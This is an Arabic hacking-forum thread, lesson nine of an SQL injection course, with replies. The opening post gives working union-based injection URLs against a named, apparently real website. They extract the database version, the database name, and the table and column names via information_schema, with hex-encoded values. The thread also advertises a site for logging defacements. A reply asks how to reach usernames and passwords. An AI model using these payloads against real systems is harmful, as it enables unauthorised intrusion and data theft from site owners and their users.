[الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

[الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده


صفحة 1 من 4 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 40

الموضوع: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

  1. #1

    افتراضي [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    دورة SQL injection , sql injection , دورة الحقن , شرح دورة الحقن , شرح sql injection , شرح دورة sql injection , الدرس التاسع من دورة sql injection الحقن ، دورة الحقن , شرح حقن القواعد ، استخراج بيانات الأعمده

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    درس اليوم تطبيق للدرس السابع! ، وفي هذا الدرس رح اقوم بإستخراج معلومات من قاعدة بيانات!

    الدرس ثقيل شويّ وصعب على المبتدأين وعلى الاشخاص اللي ما تابعوا الدروس السابقه بحق ، على شان هيك شرحته كتابه + فيديو على السريع للتوضيح!

    ملاحظة:- قبل استخدام ال information_schema يجب فحص اصدار قواعد البيانات للسيرفر ، لانه هذه الخدمه غير متوفره بالإصدارات القديمه مثل الإصدار الرابع
    اذا طلع الإصدار هو الإصدار الخامس معناتوا بتقدر تطبق الطريقه
    لإستخراج اصدار قواعد البيانات في السيرفر ننفذ الامر version()
    راجع الدرس السادس! لانه ضروري

    طيب...! ، خطوات العمل في الدرس

    في هذا الدرس رح نستخرج جداول وحقول في احدى القواعد على احدى المواقع والخطوات ستكون كالتالي
    1 - رح نفحص اذا الإصدار حق قواعد البيانات هو الإصدار الخامس ام لا >>> اذا طلع اقل من 5 معناتو الطريقة ما بتنفع على السيرفر ، ملاحظة: معظم السيرفرات ويمكن 90% منها تستعمل اصدار الخامس!
    2 - رح نستخرج اسم قاعدة البيانات حتى نستخرج منها الجداول
    3 - رح نستخرج الجداول ، ونختار احد الجداول ونستخرج الحقول اللي داخلها!

    رح يكون تطبيقنا على هذا الموقع

    كود:
    http://english.katif.net/index.php?sub=-7+union+select+1,2,3,4,5,6,7,8--
    طبعا تم شرح الدرس فيديو كمان حتى توضح الصوره!

    طيب ظهر لدينا انه الاعمده المصابه في الموقع هي 3 و 4 و 5
    طيب نجرب نستخرج اصدار قاعدة البيانات! عن طريق الامر version() ، يصير الرابط كالتالي
    كود:
    http://english.katif.net/index.php?sub=-7+union+select+1,2,version(),4,5,6,7,8--
    رح يظهر لنا الإصدار ، والاصدار في هذا السيرفر هو 5.0.92-community
    وهو الإصدار الخامس ويعني الطريقة شغاله على هذا الموقع!

    طيب الحين نبي نستخرج اسم قاعدة البيانات في السيرفر ، نضع الامر هذا database() مكان احد الأعمده المصابه ، ويصبح الامر كالتالي

    كود:
    http://english.katif.net/index.php?sub=-7+union+select+1,2,database(),4,5,6,7,8--
    رح يظهر لنا اسم قاعدة البيانات للموقع ، وطلع عندنا هذا
    katif_main
    طيب الحين نبي نسخرج جداول القاعدة
    طيب الان نستخرج الجداول والامر كالتالي
    كود:
    http://english.katif.net/index.php?sub=-7+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables--
    طيب group_concat بعتقد لازم صرتوا تعرفوها! ، راجع الدرس السابق (الثامن)
    طيب table_name وش تعني؟! ، اذا مو متذكر راجع الدرس السابع ورح تتذكر انه يوجد قاعدة اسمها information_schema وداخلها جدول اسمه tables وداخله يوجد عامود اسمه table_name
    وهذا رابط الدرس
    http://www.aljyyosh.com/vb/showthread.php?t=29707
    طيب وش تعني from+information_schema.tables وهذه وضحت للامر وين موجود table_name اللي طلبنا إستخراجه وهو من القاعدة اللي اسمها information_schema ثم الجدول اللي داخلها اللي اسمه tables

    طيب بالأمر اللي فوق طلع لنا اسماء الجداول ، طيب بس بالامر اللي فوق بطلع لنا كل اسماء الجداول لكل القواعد البيانات وبطلع معنا اسماء جداول قاعدة information_schema وهاي القاعدة جداولها كثيره وما بهمنا نستخرجهم كلهم ، على شان هيك بدنا نحدد يطلع الجداول لأي قاعدة ونحن نريده ان يطلع لنا الجداول حق القاعدة katif_main اللي استخرجنا في اول الشرح
    رح نعدل على الامر ويصير هيك

    كود:
    http://english.katif.net/index.php?sub=-7+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema+like+0x6b617469665f6d61696e--
    رح نوضح الامر! ، طبعا القسم الاول من الامر واضح ، اما القسم الثاني وهو
    where+table_schema+like+0x6b617469665f6d61696e
    في الدرس الاول شرحنا عن ال where ، وهين احنا عملنا شرط ، وقلنا له اسخرج اسماء الجداول من الجدول اللي اسمه tables الموجود في القاعدة information_schema عندما يكون table_schema يساوي 0x6b617469665f6d61696e
    و table_schema وهي العامود اللي فيه اسم القاعدة حق الجدول
    هذه 0x6b617469665f6d61696e تعني اسم القاعدة واللي هي katif_main ، بس احنى هون قمنا بتشفيرها
    البعض يسأل كيف شفرتها! ، بقول له بسيطه جدا بإمكانك تشفيرها عن طريق برامج او عن طريق مواقع او عن طريق اداة خاصه ، بس انا رح اشفرها عن طريق احد المواقع
    ندخل الى الموقع
    http://www.waraxe.us/sql-char-encoder.html
    وفي المربع الأول الكبير نكتب الكلمة الذي تريد تشفيرها وهي katif_main ومن ثم تضغط Encode Now!
    بعدها سيظهر في المربع MySql hex-encoded string التشفير حق الكلمه

    هيك صار واضح الامر ، طيب طلع عندنا اسم الجداول ، واحنى نختار جدول معيّن ، حتى نستخرج القواعد منه، نختار مثلا جدول واللي هو active_users

    طيب نشفره في البداية عن طريق الموقع ، ثم نعدل الامر ، جرب في البداية عدله لوحدك واستخرج الاعمده اللي داخله ، واذا ما عرفت شوف الأمر التالي

    كود:
    http://english.katif.net/index.php?sub=-7+union+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name+like+0x6163746976655f7573657273--
    شوف شو عدلنا في الامر ، فقط اشياء بسيطه

    بما اننا بدنا نستخرج اسماء الاعمده اكيد رح نحدد انه يجيب من الجدول اللي اسمه columns اللي موجود داخل information_schema
    واكيد اننا بدنا نحط column_name مكان العامود المصاب حتى نخبره انه يجيب لنا الاعمده مو الجداول ! ...
    واكيد بدنا نعدل على الشرط اللي هو where+table_name+like من شان نحدد انه يستخرج عندما يكون اسم الجدول للأعمده يساوي 0x6163746976655f7573657273


    والله عارف انكم مش فاهمين اشي! واللي نبر نبر ، على شان هيك عملت شرح فيديو على السريع!

    تحميل الشرح من عدة سيرفرات


    http://www.zshare.net/download/98929310183a1c62/

    او



    http://depositfiles.com/files/e87ko0i9m

    او

    https://www.rapidshare.com/files/303...njection_9.zip

    او


    http://www.filefactory.com/file/c2e8...njection_9.zip

    او

    http://www.mediafire.com/?uyenpu6w1z8rg0g

    او

    http://www.megashare.com/3875662

    او

    http://www.ziddu.com/download/184048...ion_9.zip.html

    او

    http://ifile.it/yxiw4ev/aljyyosh_sql_injection_9.zip

    او

    http://www.fileserve.com/file/DVw7sNw



    وأذا في شيء غيّر واضح ارجوا تنبيهي حتى اضيفه للدرس

    بالتوفيق للجميع

    اخوكم ASDELY-ScOrPiOn من منتديات جيوش الهكرز و ASDELY.NET


    التعديل الأخير تم بواسطة ASDELY-ScOrPiOn ; 01-29-2012 الساعة 01:48 PM
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  2. #2
    هكر متميز الصورة الرمزية kaiser hackers
    تاريخ التسجيل
    Jan 2012
    الدولة
    United Kingdom-Britain-London
    المشاركات
    751

    افتراضي رد: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    شرف كبير أن أكون أول من يرد على أحد مواضيع المميزه
    مشكوووووووووووور على الشرح ننتضرالمزيد من أبداعك رايتك بيضاء
    قــــــيــــــصــــــر الــــــهــــــكــــــر

    أذآ فكرت في أختراقي سآرفع يدي أحترآم لك ولشجاعتك

    ولآكن تأكد أنني لن أنزلها ألى على حرق جهازك

    لآ أحب دخول الآجهزة بأحترآم أحب دخول الآجهزة بآجرام

    لتوآصل[email protected]

    قناتي على اليوتيوب



  3. #3

    افتراضي رد: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    اقتباس المشاركة الأصلية كتبت بواسطة kaiser hackers مشاهدة المشاركة
    شرف كبير أن أكون أول من يرد على أحد مواضيع المميزه
    مشكوووووووووووور على الشرح ننتضرالمزيد من أبداعك رايتك بيضاء
    هلا فيك حبيبي ومنور الموضوع

    وأي استفسار انا موجود

    بالتوفيق
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  4. #4
    هكر متميز الصورة الرمزية kaiser hackers
    تاريخ التسجيل
    Jan 2012
    الدولة
    United Kingdom-Britain-London
    المشاركات
    751

    افتراضي رد: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    يسلموووووووووووو شرح ما بعده أستفسار كله مفهووووووووووووم
    بنسبه لهاذي الدوره الحمدلله مفهومه لانو في الجامعه درست ماده أسمها قواعد البيانات وهي سهله كثير وبكذا ساعدتني في فهم الموضوع
    كــــــــــــــــــــــــ ــــــــــــلــــــــــــ ـــــــــــــــــــــــــ ك أبـــــــــــــــــــــــ ـــــــــــداع يا ASDELY-ScOrPiOn
    قــــــيــــــصــــــر الــــــهــــــكــــــر

    أذآ فكرت في أختراقي سآرفع يدي أحترآم لك ولشجاعتك

    ولآكن تأكد أنني لن أنزلها ألى على حرق جهازك

    لآ أحب دخول الآجهزة بأحترآم أحب دخول الآجهزة بآجرام

    لتوآصل[email protected]

    قناتي على اليوتيوب



  5. #5

    افتراضي رد: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    موضوع سلسل وسهل بس ما كملت لين ما نجيب اليوزر والباس .. .؟




    سبحان الله , والحمد لله , ولا اله الا الله


    ( ضحكتي بلس جروحي )





  6. #6

    افتراضي رد: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    اقتباس المشاركة الأصلية كتبت بواسطة kaiser hackers مشاهدة المشاركة
    يسلموووووووووووو شرح ما بعده أستفسار كله مفهووووووووووووم
    بنسبه لهاذي الدوره الحمدلله مفهومه لانو في الجامعه درست ماده أسمها قواعد البيانات وهي سهله كثير وبكذا ساعدتني في فهم الموضوع
    كــــــــــــــــــــــــ ــــــــــــلــــــــــــ ـــــــــــــــــــــــــ ك أبـــــــــــــــــــــــ ـــــــــــداع يا ASDELY-ScOrPiOn
    مشكووور على المرور العطر ، وقد سُرٍرتُ بان ما قدمته افادك في حياتك الشخصيه
    تحياتي لك

    اقتباس المشاركة الأصلية كتبت بواسطة Dr.iTaChi مشاهدة المشاركة
    موضوع سلسل وسهل بس ما كملت لين ما نجيب اليوزر والباس .. .؟
    هلا فيك حبيبي ومنور الموضوع
    انا في الشرح قمت بإستخراج بيانات من احدى الجداول بشكل سريع ، وبإمكانك التطبيق لكن استخراج بيانات من جدول اخر له علاقه باليوزرات والباسووردات! ، والدوره لم تنتهي بعد! ، سيكون المزيد من الدروس والشروحات.!
    وانا هدفي هو ليس التطبيق او تنفيذ الاوامر كما رأيت مني! ، انا اطمح لتوصيل الفكره وتوضيح الخوارزميه الذي تعمل عليها ثغرات الحقن! مما سيكون لديّك مجال اوسع ومجال التطوير والإكتشاف فيها...!
    بإذن الله سأشرح في الدروس القدامه كل خطوه بالتفصيل! ، وبالنهاية سنقوم بانشاء درس اخير والذي سيكون بمثابة تطبيق لكل ما تعلمناه!


    بالتوفيق للجميع
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  7. #7

    افتراضي رد: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    مشكوووووووووووور على الشرح
    هكر اسياا

    سوف يتم تدميررررررررررررررررررررر ررررر

    كل المواقع المشوهة للسلام


  8. #8

    افتراضي رد: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    مشكور على الشرح الوافي والمهم ......... في شرحك هناك ميزة وهي وصول الفكرة الى العضو
    والله مبدع اخي الف شكر

  9. #9

    افتراضي رد: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    اقتباس المشاركة الأصلية كتبت بواسطة HaKeR AsSsYa مشاهدة المشاركة
    مشكوووووووووووور على الشرح
    هلا فيك حبيبي ومنور الموضوع
    بالتوفيق.!

    اقتباس المشاركة الأصلية كتبت بواسطة Mr liOnDZ مشاهدة المشاركة
    مشكور على الشرح الوافي والمهم ......... في شرحك هناك ميزة وهي وصول الفكرة الى العضو
    والله مبدع اخي الف شكر
    مشكوور حبيبي على المرور ومنور الموضوع بمرورك الجميل
    تحياتي لك
    بالتوفيق...!
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  10. #10

    افتراضي رد: [الدرس التاسع] شرح إستخراج اسماء الجداول والأعمده

    اللهم اغفر للمسلمين والمسلمات والمؤمنين والمؤمنات الأحياء منهم والأموات
    اللهــم إنـي أعـوذ بـك من نفحـة الكبـريـاء
    اللهم لا تجعل الدنيا أكبر همــــنا
    اللهم ارزق شباب المسلمين زوجات صالحات وارزق بناتهم أزواجا صالحين
    اللهم باعد بيننا و بين الشبهات و الشهوات
    اللهـــــــم فك قيد أسرى المسلميـن في كل مكان و دمر الكفار و الجبابرة و الطواغيت

صفحة 1 من 4 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. { الدرس التاسع } شرح تلغيم . . مجلد بور بونت
    بواسطة wookr في المنتدى دورة التلغيم
    مشاركات: 128
    آخر مشاركة: 05-30-2015, 12:31 PM
  2. الدرس التاسع رفع شال من لوحة جوملا
    بواسطة pSyCh0_3D في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 11
    آخر مشاركة: 06-03-2012, 09:30 AM
  3. الدرس التاسع - تغيير الاندكس بسكربت المجرم
    بواسطة الشريف 515 في المنتدى منتدى الإختراق العام
    مشاركات: 2
    آخر مشاركة: 03-04-2012, 12:32 AM
  4. الدرس التاسع شرح فتح بورت في اكس بي
    بواسطة حمودي خواجي في المنتدى قسم المواضيع المخالفة والمكررة
    مشاركات: 2
    آخر مشاركة: 11-23-2011, 04:33 PM
  5. الدرس التاسع شرح فتح بورت في اكس بي
    بواسطة حمودي خواجي في المنتدى أدوات اختراق الاجهزة والدمج والتشفير
    مشاركات: 2
    آخر مشاركة: 11-23-2011, 04:33 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •